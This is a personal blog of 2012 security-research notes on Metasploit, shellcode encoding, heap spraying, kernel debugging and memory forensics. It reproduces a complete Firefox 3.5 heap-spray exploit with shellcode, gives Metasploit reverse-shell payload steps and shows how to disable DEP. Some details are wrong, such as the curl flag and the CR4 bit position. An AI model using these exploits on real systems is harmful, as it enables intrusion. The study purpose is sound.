Saturday, April 28, 2012
Open a website from the command prompt
"c:\program files\internet exploder\iexplore.exe 'http://www.yahoo.com'"
"c:\program files\internet exploder\iexplore.exe ''C:\hello.html"
metasploit usage
1. download and install it
2. open the metasploit console
windows: go to programs
linux: type msf<tab>, it will show you the commands
3. go to the metasploit website, search for a vulnerability, download the specific version of the application.
4. it will look like:
msf > use exploit/windows/fileformat/adobe_reader_u3d
msf exploit(adobe_reader_u3d) > show payloads
msf exploit(adobe_reader_u3d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_reader_u3d) > set LHOST [MY IP ADDRESS]
msf exploit(adobe_reader_u3d) > exploit
5. for example, you can set the payload as /windows/exec
msf> use exploit/....
msf> set payload windows/exec
msf> set cmd calc.exe
6. in this case, if your shellcode executed, the calculator will show up on your screen.
Convert binary shellcode to JavaScript percent encoding
<html>
<head>
<script language="JavaScript" type="text/javascript">
function ConvertShellCode(strdata) {
    // Strip whitespace, backslashes and 'x' from "\x41\x42..." input, leaving bare hex digits
    var s = new String(strdata);
    s = s.replace(/[\s\\x]/g, '');
    var strcode = '';
    // Pack two bytes into each %u unit, second byte first (little-endian 16-bit code units)
    for (var idx = 0; idx < s.length; idx += 4)
        strcode += "%u" + s.substr(idx + 2, 2) + s.substr(idx + 0, 2);
    document.forms.ShellToJavascript.decode.value = strcode;
}
</script>
</head>
<body>
<form name="ShellToJavascript" method="post">
<textarea rows="10" cols="100" name="encode"></textarea><br />
<textarea rows="10" cols="100" name="decode"></textarea><br />
<input type="button" value="Encode" onclick="return ConvertShellCode(document.ShellToJavascript.encode.value)" />
</form>
</body>
</html>
http://www.governmentsecurity.org/forum/topic/27916-shell-code-convertorencoder/
Tuesday, April 24, 2012
How to write Shell Code; Reverse Shell code
http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html
Use Metasploit to generate shellcode
This post explains how to use metasploit to generate binary shellcode:
http://www.backtrack-linux.org/forums/showthread.php?t=35480
msf > use windows/exec
msf payload(exec) > show options

Module options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none

msf payload(exec) > set cmd taskkill /PID 12345
cmd => taskkill /PID 12345
msf payload(exec) > show options

Module options:

   Name      Current Setting      Required  Description
   ----      ---------------      --------  -----------
   CMD       taskkill /PID 12345  yes       The command string to execute
   EXITFUNC  process              yes       Exit technique: seh, thread, process, none

msf payload(exec) > generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

    -E        Force encoding.
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -e <opt>  The name of the encoder module to use.
    -f <opt>  The output file name (otherwise stdout)
    -h        Help banner.
    -i <opt>  the number of encoding iterations.
    -k        Keep the template executable functional
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The Platform for output.
    -s <opt>  NOP sled length.
    -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
    -x <opt>  The executable template to use

msf payload(exec) > generate -t exe -f /root/windows-exec-payload.exe
[*] Writing 73802 bytes to /root/windows-exec-payload.exe...
msf payload(exec) > generate -f /root/windows-exec-payload.shellcode
[*] Writing 1013 bytes to /root/windows-exec-payload.shellcode...
Monday, April 23, 2012
User program write to IO ports on Windows
http://retired.beyondlogic.org/porttalk/porttalk.htm
Download the PortTalk 2.2 folder.
Read the README file to learn how to use it.
C:\porttalk>allowio beep /a
allows the program beep.exe to write to all ports
C:\porttalk\AllowIO>allowio 0x42 0x43 0x61 beep.exe
allows beep.exe to access ports 0x42, 0x43 and 0x61
Look at the IoExample folder to see how to write a sample user program that writes to ports.
In addition, we could use the assembly IO instruction to write to a port:
out dx, al
Compile the assembly code into a WritePort.exe file, and use AllowIo.exe to set the bitmap permission for this executable:
AllowIo.exe WritePort.exe /a
Again, AllowIo.exe provides the facility to modify the IO permission bitmap and to write/read IO ports via IOCTL calls.
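As an added illustration (not PortTalk's code), the I/O permission bitmap that AllowIo.exe edits is modelled in Python so the difference between an explicit port list and the /a switch can be checked. The layout (one bit per port, 8192 bytes, a set bit means access is denied) is the x86 TSS IOPM format; the port numbers and the two command lines are the ones from the post, and the small argument parser only models that syntax.

```python
IOPM_PORTS = 0x10000          # 16-bit I/O address space
IOPM_BYTES = IOPM_PORTS // 8  # 8192 bytes, one bit per port


def iopm_deny_all():
    """Default user-mode state: every bit set, so every IN/OUT faults."""
    return bytearray(b"\xFF" * IOPM_BYTES)


def iopm_allow(bitmap, ports):
    """Clear the bit for each listed port (what 'allowio 0x42 0x43 0x61 beep.exe' does)."""
    for port in ports:
        if not 0 <= port < IOPM_PORTS:
            raise ValueError("port out of range: %#x" % port)
        bitmap[port >> 3] &= ~(1 << (port & 7)) & 0xFF
    return bitmap


def iopm_allow_all(bitmap):
    """What the '/a' switch amounts to: clear every bit, no port is protected."""
    bitmap[:] = b"\x00" * IOPM_BYTES
    return bitmap


def iopm_is_allowed(bitmap, port):
    return not (bitmap[port >> 3] >> (port & 7)) & 1


def iopm_allowed_ports(bitmap):
    """Audit helper: every port this bitmap lets user mode touch."""
    return [p for p in range(IOPM_PORTS) if iopm_is_allowed(bitmap, p)]


def bitmap_for_command(args):
    """Model of the allowio argument syntax shown in the post: hex ports, or '/a'.
    The program name is ignored here; only the resulting permissions matter."""
    bitmap = iopm_deny_all()
    if "/a" in args:
        return iopm_allow_all(bitmap)
    ports = [int(a, 16) for a in args if a.lower().startswith("0x")]
    return iopm_allow(bitmap, ports)


if __name__ == "__main__":
    listed = bitmap_for_command(["0x42", "0x43", "0x61", "beep.exe"])
    everything = bitmap_for_command(["beep", "/a"])
    print([hex(p) for p in iopm_allowed_ports(listed)])      # ['0x42', '0x43', '0x61']
    print(len(iopm_allowed_ports(everything)))               # 65536
```

Listing the allowed ports of a bitmap is the check to run before trusting a user program with port access: the /a form leaves nothing protected, including the keyboard controller at 0x60.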
Sunday, April 22, 2012
Build Firefox Source code
Download Source Code:
https://developer.mozilla.org/En/Developer_Guide/Source_Code/Downloading_Source_Archives
Compile & Build:
https://developer.mozilla.org/En/Simple_Firefox_build
https://developer.mozilla.org/en/Build_Documentation
Crash CentOS...
I crashed my CentOS testing machine today. The command I ran:
$ yum remove glib2
I was trying to reinstall glib2 (I know there is a reinstall command, but I don't know why I didn't use that one), and I removed the glib2 package.
After I ran this command, I went out for dinner.
When I came back, my system had crashed. I tried many ways to rescue it, but none of them helped.
For example:
reboot into another kernel.
Put in the CentOS installation disk, upgrade the OS, rescue the OS.....
Finally, I reinstalled CentOS. One lucky thing is that I had backed up all my data on the server.
Never, never remove the glib2 package in future...
Saturday, April 21, 2012
CentOS 5.5 Download
http://mirror.teklinks.com/centos/5.5/isos/i386/
http://centos.org/modules/tinycontent/index.php?id=15
Go to the CentOS website and download the mirror list.
Some mirrors don't have the full list of CentOS versions. You need to check them one by one.
Memory tool on Windows
vmmap
http://technet.microsoft.com/en-us/sysinternals/dd535533
cheatengine
http://www.cheatengine.org/
Thursday, April 19, 2012
Run Python on Windows
1. Download Python
http://python.org/download/
2. Install it. It is usually installed at C:\Python27
3. To run it, you need to add C:\Python27 to the PATH environment variable.
http://docs.python.org/faq/windows.html#how-do-i-run-a-python-program-under-windows
Add
;C:\Python23
to the PATH environment variable in the
properties window of "My Computer" under the "Advanced" tab
4. Type python from the command line
VMware fusion snapshot
VMware Fusion snapshot saves the whole memory image file when you take a snapshot. You can find the memory image in the VM folder.
Here is some more detailed info about VMware snapshots:
http://www.vmware.com/support/ws4/doc/preserve_snapshot_ws.html
OS161 Homework
A very good post on OS161 homework implementation:
http://jhshi.wordpress.com/category/os161/
Or you can find some sample code by searching for: "OS161 googleproject"
Reverse Java Script Shell Code
http://pmelson.blogspot.com/2009/11/reversing-javascript-shellcode-step-by.html
It is a detailed post, but one thing I do not understand is the SpiderMonkey part.
After using SpiderMonkey to translate the original percent-encoded data, the result is totally different from the original data.
However, one comment on this post points out that we only need to remove the "%u" and then reverse the order of the original data.
Not sure which way is correct.
But it is a very good post for reversing JS shellcode.
BTW, I installed SpiderMonkey on CentOS without any problem.
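Added example, not from this post or the linked one, covering both the converter page above and the "remove %u and reverse" question here: a decoder that turns escape()-style text back into the bytes it occupies in memory, plus the inverse packing. Each %uXXXX is a 16-bit code unit that x86 stores little-endian, so the two hex pairs swap within each unit; the sample inputs are constructed, the last one from the tail of the %u string in the heap spray post below.

```python
import re

# One token per match: a %uXXXX code unit, a %XX byte, or a literal character.
TOKEN_RE = re.compile(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})|(.)', re.S)


def js_unescape_bytes(text):
    """Decode escape()-style text to the bytes it occupies in memory.
    %uXXXX is a 16-bit code unit; x86 stores it little-endian, so the
    high hex pair lands in the second byte (the 'reverse the order' step).
    %XX and plain characters are single bytes, as JavaScript unescape() treats them."""
    out = bytearray()
    for unit, byte, ch in TOKEN_RE.findall(text):
        if unit:
            out += bytes([int(unit[2:], 16), int(unit[:2], 16)])
        elif byte:
            out.append(int(byte, 16))
        else:
            out.append(ord(ch) & 0xFF)
    return bytes(out)


def hexdump_to_bytes(text):
    """Accept the '\\x41\\x42 ...' form that the converter page takes as input."""
    return bytes.fromhex(re.sub(r'[\s\\x]', '', text))


def bytes_to_js_unicode(data):
    """Inverse of js_unescape_bytes for even-length input: two bytes per %u unit,
    second byte first, which is exactly what the converter page's loop emits."""
    if len(data) % 2:
        raise ValueError("need an even number of bytes")
    return "".join("%%u%02X%02X" % (data[i + 1], data[i]) for i in range(0, len(data), 2))


if __name__ == "__main__":
    # Constructed sample: the tail of the post's %u string spells the command name.
    print(js_unescape_bytes("%u6163%u636C%u652E%u6578%u9000"))   # b'calc.exe\x00\x90'
    print(bytes_to_js_unicode(hexdump_to_bytes(r"\x63\x61\x6c\x63")))  # %u6163%u636C
```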
Heap Spray Attack
http://1337day.com/exploits/9493
Vulnerability + NOP sleds + shellcode
e.g., this is an exploit HTML file targeting Firefox 3.5.
It uses a heap spray attack to launch calc.exe on Windows platforms.
The same vulnerability exists in the same Firefox version on Linux, but the shellcode needs to be modified.
<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw </FONT>
</p>
</div>
<script language=JavaScript>
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
/* Heap Spray Code */
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x40001)
{
fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)
{
sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
function escapeData(data)
{
var i;
var c;
var escData='';
for(i=0;i<data.length;i++)
{
c=data.charAt(i);
if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
escData+=c;
}
return escData;
}
function DataTranslator(){
searchArray = new Array();
searchArray[0] = new Array();
searchArray[0]["str"] = "blah";
var newElement = document.getElementById("content")
if (document.getElementsByTagName) {
var i=0;
pTags = newElement.getElementsByTagName("p")
if (pTags.length > 0)
while (i<pTags.length)
{
oTags = pTags[i].getElementsByTagName("font")
searchArray[i+1] = new Array()
if (oTags[0])
{
searchArray[i+1]["str"] = oTags[0].innerHTML;
}
i++
}
}
}
function GenerateHTML()
{
var html = "";
for (i=1;i<searchArray.length;i++)
{
html += escapeData(searchArray[i]["str"])
}
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
NOP sleds in Heap Spray
The NOP sled in a heap spray is more general. It doesn't need to be 0x90. It could be anything that doesn't disturb the register values or stop the shellcode from running.
For example
0c0c instruction: it means OR AL, 0c
Basically, the first 0c0c instruction only changes the low byte (AL) of the EAX register; as long as it doesn't crash the program after the popa instruction in the shellcode, it can be used as the heap spray filler.
http://www.ask-a-pentester.com/index.php/9/about-nop-slides-in-js-heap-overflows
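Added example, not from either post: a static checker for the spray pattern the two posts describe (a one-value %u sled such as 0c0c, a long varied %u blob, a string that doubles itself, and a loop filling an array with sled + blob). The SLED_UNITS set, the 32-unit blob threshold and the sample script are constructed for this example; the sample reproduces the loop shape from the post with the shellcode replaced by filler units.

```python
import re

# Code units commonly seen as spray filler; 0x0c0c (OR AL, 0x0c) is the one the
# post explains, 0x9090 the classic NOP. Constructed list for this example.
SLED_UNITS = {0x0C0C, 0x0A0A, 0x0D0D, 0x9090}
BLOB_MIN_UNITS = 32   # heuristic: shorter %u literals are not counted as a blob

UNESCAPE_RE = re.compile(r'unescape\(\s*((?:"[^"]*"\s*\+?\s*)+)\)')
UNIT_RE = re.compile(r'%u([0-9A-Fa-f]{4})')


def unescape_literals(js):
    """Concatenate the string pieces of every unescape("..." + "...") call."""
    return ["".join(re.findall(r'"([^"]*)"', m.group(1))) for m in UNESCAPE_RE.finditer(js)]


def classify_literal(text):
    """A sled is one value repeated; a blob is long with many distinct units."""
    units = [int(h, 16) for h in UNIT_RE.findall(text)]
    if not units:
        return None
    distinct = len(set(units))
    return {"units": len(units), "distinct": distinct,
            "sled": distinct == 1 and units[0] in SLED_UNITS,
            "blob": len(units) >= BLOB_MIN_UNITS and distinct > 16}


def heap_spray_indicators(js):
    """Return the spray indicators found in a script, in a fixed order."""
    hits = []
    lits = [c for c in map(classify_literal, unescape_literals(js)) if c]
    if any(l["sled"] for l in lits):
        hits.append("sled-literal")
    if any(l["blob"] for l in lits):
        hits.append("encoded-blob")
    if re.search(r'(\w+)\s*\+=\s*\1\b', js):            # fullblock += fullblock
        hits.append("string-doubling")
    if re.search(r'\[\s*\w+\s*\]\s*=\s*\w+\s*\+\s*\w+', js) and re.search(r'for\s*\(', js):
        hits.append("array-fill")                         # arr[i] = sled + blob inside a loop
    return hits


# Constructed excerpt modelled on the spray loop in the post; the shellcode is
# replaced by arbitrary filler units so the sample carries no payload.
FILLER = "".join("%%u%04X" % ((i * 40503 + 17) & 0xFFFF) for i in range(48))
SAMPLE_JS = '''
var shellcode = unescape("%s" +
    "%s");
oneblock = unescape("%%u0c0c%%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x40001) { fullblock += fullblock; }
sprayContainer = new Array();
for (i=0; i<600; i++) { sprayContainer[i] = fullblock + shellcode; }
''' % (FILLER[:144], FILLER[144:])
BENIGN_JS = 'var s = unescape("%20hi"); for (var i = 0; i < 3; i++) { out[i] = i * 2; }'

if __name__ == "__main__":
    print(heap_spray_indicators(SAMPLE_JS))   # all four indicators
    print(heap_spray_indicators(BENIGN_JS))   # []
```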
Tuesday, April 17, 2012
Hacking website
Milworm: http://1337day.com/
http://www.exploit-db.com/
http://www.metasploit.com/
http://contagiodump.blogspot.com/
http://www.offensivecomputing.net/
Windows Kernel Debugging
To set up Windows kernel debugging, please see this article:
http://www.blogger.com/blogger.g?blogID=6275589693478001671#editor/target=post;postID=4149230560487743600
Some useful commands:
> dt _eprocess // see the structure of eprocess
> dt _peb // process environment block
> dt _kprocess // kernel process structure
> dt _heap // heap structure
> dt _heap_segment
> dt _heap_entry
Application debugging (e.g. Firefox)
> !process 0 0 // list all the running processes
> .context <dirbase_address> // this enables the process context; you can find the DirBase address in the Firefox process info printed by !process 0 0. Sometimes you need to run the following command before enabling the context:
>.enable forcedecoderuser
> dt _peb <peb_address_of_Firefox>
> dd <address> // you can see the content of that location, like the x command in QEMU
> dd /p <address> // see the physical address content
> dt _heap <heap_address>
> dt _heap_entry <heap_entry_address>
Saturday, April 14, 2012
Disable PAE on Windows XP SP3
Go to Computer -> Properties; the hardware specification shows whether PAE is enabled.
Enabling PAE means setting bit 5, PAE, of the system register CR4, which is the sixth bit from the left.
Disable method:
Normal boot.ini with PAE & DEP
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Pro x86" /noexecute=optin /fastdetect
Disabled DEP & PAE
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Pro x86" /execute /fastdetect
Tuesday, April 10, 2012
wget in Mac
echo 'alias wget="curl -O"' >> ~/.bash_profile
curl -0 url > filename
-0 means http
saves the file to filename
see man curl for more
Monday, April 9, 2012
Windows Kernel Debugging by using serial port
1. Set up two machines: the target machine and the debugging machine
2. Download windbg on the debugging machine
http://msdn.microsoft.com/en-us/windows/hardware/gg463009
for Windows XP you need to download the Windows 7 version
3. Change the boot.ini file on the target machine to recognize the com1 serial port.
4. Boot the target machine into debugging mode (press F8 when booting)
5. Start windbg on the debugging machine, and choose the correct device.
e.g. serial port to USB
6. Set the correct symbol table path.
e.g. srv*c\symbols*http://msdl.microsoft.com/download/symbols
7. run dt _eprocess
How to change boot.ini
http://www.etdot.com/2008/04/16/windbg-and-vmware/
http://support.microsoft.com/kb/289022
You can also get more information from: Windows Internals, 5th Edition
Another book: Advanced Windows Debugging
Friday, April 6, 2012
QEMU usage menu page
http://wiki.qemu.org/download/qemu-doc.html
common commands:
stop: stop the virtual machine
c/cont: resume the machine
x /20w location: see the content at location
x /20c location: see the content by character
x /fmt location: fmt could be count, format, size
xp /20w location: see the content at physical memory location
Tuesday, April 3, 2012
How to find PsActiveProcessHead in memory on Windows
PsActiveProcessHead is a pointer to the start of the kernel's list of _EPROCESS structures.
1. Get the FS register value: 0xffdff000, which points to the Kernel Processor Control Region (KPCR) structure
2. KDVersionBlock is at the offset 0x34 of KPCR
3. Get the KdVersionBlock value: 0x8054c738 (run x /20w 0xffdff034 in QEMU monitor)
4. PsActiveProcessHead is at the offset 0x78 of KdVersionBlock, which is at location 0x8054c7b0
5. Get the PsActiveProcessHead value: 0x80560bd8 ( run x /20w 0x8054c7b0)
6. See the LIST_ENTRY field of PsActiveProcessHead; it is a doubly linked list.
7. See the process name ( run x /20c location)
More Info:
http://www.reverse-engineering.info/SystemInformation/GetVarXP.pdf
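Added example, not from the post: the lookup chain above (FS -> KPCR -> KdVersionBlock -> PsActiveProcessHead -> list walk) replayed in Python over a constructed little-endian memory image, the way a memory-forensics script would do it on a dump instead of the QEMU monitor. The KPCR address and offsets 0x34 and 0x78, and the values 0x8054c738 and 0x80560bd8, are the post's; the _EPROCESS offsets 0x88 (ActiveProcessLinks) and 0x174 (ImageFileName) are assumed XP SP3 values not stated in the post, and the two process entries are constructed.

```python
import struct

# Given in the post (Windows XP, 32-bit):
KPCR_ADDR = 0xFFDFF000              # FS base points at the KPCR
KPCR_KDVERSIONBLOCK_OFF = 0x34
KDVB_PSACTIVEPROCESSHEAD_OFF = 0x78
# _EPROCESS field offsets: ASSUMED XP SP3 values, not stated in the post.
EPROC_ACTIVEPROCESSLINKS_OFF = 0x88
EPROC_IMAGEFILENAME_OFF = 0x174
EPROC_IMAGEFILENAME_LEN = 16


class Memory:
    """Sparse 32-bit virtual memory made of (base, bytearray) regions."""
    def __init__(self, regions):
        self.regions = regions

    def _locate(self, addr, n):
        for base, buf in self.regions:
            if base <= addr and addr + n <= base + len(buf):
                return buf, addr - base
        raise ValueError("unmapped address 0x%08x" % addr)

    def read(self, addr, n):
        buf, off = self._locate(addr, n)
        return bytes(buf[off:off + n])

    def read_dword(self, addr):          # the 'x /20w' view: little-endian 32-bit words
        return struct.unpack("<I", self.read(addr, 4))[0]

    def write(self, addr, data):
        buf, off = self._locate(addr, len(data))
        buf[off:off + len(data)] = data

    def write_dword(self, addr, value):
        self.write(addr, struct.pack("<I", value))


def find_psactiveprocesshead(mem):
    """Steps 1-5 of the post: KPCR+0x34 -> KdVersionBlock, then +0x78 -> list head."""
    kdvb = mem.read_dword(KPCR_ADDR + KPCR_KDVERSIONBLOCK_OFF)
    return mem.read_dword(kdvb + KDVB_PSACTIVEPROCESSHEAD_OFF)


def walk_process_list(mem, head, limit=1024):
    """Steps 6-7: follow Flink; each entry is _EPROCESS.ActiveProcessLinks, so the
    _EPROCESS base is entry - 0x88 and the name sits at base + 0x174."""
    names, seen = [], set()
    flink = mem.read_dword(head)
    while flink != head and flink not in seen and len(names) < limit:
        seen.add(flink)                           # guard against a corrupted/looping list
        eproc = flink - EPROC_ACTIVEPROCESSLINKS_OFF
        raw = mem.read(eproc + EPROC_IMAGEFILENAME_OFF, EPROC_IMAGEFILENAME_LEN)
        names.append(raw.split(b"\x00", 1)[0].decode("ascii", "replace"))
        flink = mem.read_dword(flink)
    return names


def build_sample_memory():
    """Constructed image: the post's addresses plus two fake _EPROCESS blocks."""
    mem = Memory([(KPCR_ADDR, bytearray(0x1000)), (0x80540000, bytearray(0x50000))])
    kdvb, head = 0x8054C738, 0x80560BD8                 # values from the post
    procs = [(0x80570000, b"System"), (0x80580000, b"firefox.exe")]   # constructed
    mem.write_dword(KPCR_ADDR + KPCR_KDVERSIONBLOCK_OFF, kdvb)
    mem.write_dword(kdvb + KDVB_PSACTIVEPROCESSHEAD_OFF, head)
    links = [head] + [p + EPROC_ACTIVEPROCESSLINKS_OFF for p, _ in procs]
    for i, entry in enumerate(links):                   # circular doubly linked list
        mem.write_dword(entry, links[(i + 1) % len(links)])       # Flink
        mem.write_dword(entry + 4, links[(i - 1) % len(links)])   # Blink
    for base, name in procs:
        mem.write(base + EPROC_IMAGEFILENAME_OFF, name.ljust(EPROC_IMAGEFILENAME_LEN, b"\x00"))
    return mem


if __name__ == "__main__":
    m = build_sample_memory()
    h = find_psactiveprocesshead(m)
    print("PsActiveProcessHead = 0x%08x" % h, walk_process_list(m, h))
```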
Monday, April 2, 2012
Find useful memory in windows
http://www.reverse-engineering.info/SystemInformation/GetVarXP.pdf
http://forum.sysinternals.com/devphysicalmemoryfinding-my-peb_topic3473.html
http://moyix.blogspot.com/2008/04/finding-kernel-global-variables-in.html
http://www.facultyresourcecenter.com/curriculum/ResourceKits/Default.aspx?c1=en-us&c2=0